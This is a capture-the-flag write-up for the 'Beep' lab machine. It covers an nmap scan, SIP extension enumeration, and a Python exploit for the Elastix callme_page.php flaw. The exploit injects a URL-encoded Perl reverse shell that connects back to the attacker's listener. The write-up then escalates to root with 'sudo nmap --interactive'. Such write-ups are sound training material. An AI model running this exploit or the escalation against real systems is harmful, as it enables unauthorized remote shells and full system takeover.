Beep

OS: Linux, Difficulty: Easy, IP: 10.10.10.7

Initial Enumeration

# Nmap 7.80 scan initiated Wed Sep 25 13:54:58 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 993,80,110,10000,143,3306,4190,4559,995,111,5038,443,22,4445,880,25,U:10000 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.23s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) STLS AUTH-RESP-CODE TOP USER RESP-CODES UIDL APOP PIPELINING LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: BINARY UNSELECT Completed ATOMIC LITERAL+ X-NETSCAPE LIST-SUBSCRIBED SORT=MODSEQ IDLE UIDPLUS ACL MULTIAPPEND IMAP4rev1 RIGHTS=kxte STARTTLS CATENATE THREAD=ORDEREDSUBJECT NAMESPACE NO ANNOTATEMORE THREAD=REFERENCES LISTEXT OK CHILDREN CONDSTORE QUOTA MAILBOX-REFERRALS IMAP4 URLAUTHA0001 SORT ID RENAME
443/tcp   open  ssl/https?
|_ssl-date: 2019-09-25T08:20:35+00:00; -7m55s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device|PBX|WAP|printer|specialized
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), HP embedded (94%), Enterasys embedded (94%), Netgear embedded (94%), Osmosys embedded (93%), Riverbed RiOS (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/h:enterasys:ap3620 cpe:/h:netgear:eva9100 cpe:/o:riverbed:rios
Aggressive OS guesses: Linux 2.6.27 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.18 (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.30 (95%), Linux 2.6.5 (Fedora Core 2) (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: -7m55s

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   226.92 ms 10.10.14.1
2   227.25 ms 10.10.10.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 25 14:01:06 2019 -- 1 IP address (1 host up) scanned in 368.60 seconds

Running all the services through the searchsploit didn't get me anything worthwhile, either the exploits failed or were not at all working due to compatibility or version issues. The obvious attack vectors left were the web-servers on port 10000 and 80 . The one at 10000 didn't have anything interesting however the one at 80, the elastix server had some publicly available exploits, namely 18650.

--- SNIP ---
import urllib
import ssl
rhost="10.10.10.7"
lhost="10.10.14.4"
lport=5555
extension="1000"

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
--- SNIP ---

Running the script as it is didn't get me the shell as expected however did get me SSL errors, which I tried resolving using the modified script below, and along side that I had to find a valid extension number which I did using the following snippet of svwar tool.

svwar -m INVITE -e100-300 10.10.10.7

import urllib
import ssl
rhost="10.10.10.7"
lhost="10.10.14.4"
lport=5555
extension="233"

# Reverse shell payload
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url, context=ctx)

However this didn't seem to work either, still got SSL errors, so as I knew this was just making a request to a the web-server with some parameters, so I pasted the request in the browser and kept listening for the reverse shell and to my surprise I got the reverse shell.

$ nc -lvnp 5555   
listening on [any] 5555 ...          
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.7] 58227                  
id                                   
uid=100(asterisk) gid=101(asterisk)

User and Root Own

Beneath the exploit script itself there was a way mentioned for privilege escalation, to which I gave a shot and to my astonishment that worked out just fine and got me root shell.

sudo nmap --interactive              
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )                    
Welcome to Interactive Mode -- press h <enter> for help                    
nmap> !sh                            
bash                                 
id                                   
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)                                                                
cat /root/root.txt                   
d88e0***
cat /home/fanis/user.txt             
aeff3***

Learning Outcome

I learnt about SIP extensions and how to find a valid one for the machine and target, and how reading the exploit scripts in details can actually help in owning the complete machine.